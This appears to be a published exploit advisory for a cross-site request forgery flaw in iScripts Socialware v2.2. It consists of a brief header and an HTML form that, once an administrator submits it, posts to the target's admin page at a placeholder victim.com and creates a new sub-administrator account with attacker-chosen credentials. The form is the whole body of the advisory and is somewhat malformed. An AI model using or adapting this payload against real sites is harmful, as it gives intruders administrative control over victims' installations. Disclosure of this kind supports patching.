< ------------------- header data start ------------------- >


#############################################################

# Application Name : iScripts Socialware v2.2

# Vulnerable Type : XSRF

# Infection : Add Sub-Admin

# author : BARCOD3 - Bug Researchers

# Demo : http://www.iscripts.com/socialware/demo

# Home : ozkanbozkurt.com

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<h3>BARCOD3</h3>
<form name=form1 method=POST action=http://victim.com/scriptpatch/admin/sub_admins.php?rghMenu=Admin Suite Controls onSubmit=return registration_chk()>
<input type=hidden name=’Action’ value=save>
<input type=hidden name=’AdminId’ value=>
<input name=hidden class=textbox id=username value=username >
<input name=hidden type=password class=textbox id=password value=passWORD >
<input name=hidden type=password class=textbox value=passWORD >
<input name=hidden class=textbox value=LASTNAME>
<input name=hidden class=textbox id=Email value=EMAIL >
<select name=GroupId class=textbox value=GROUPNAME selectED>
</select>
<input class=buttons type=submit value=Add Details name=submit>
</form>
< -- bug code end of -- >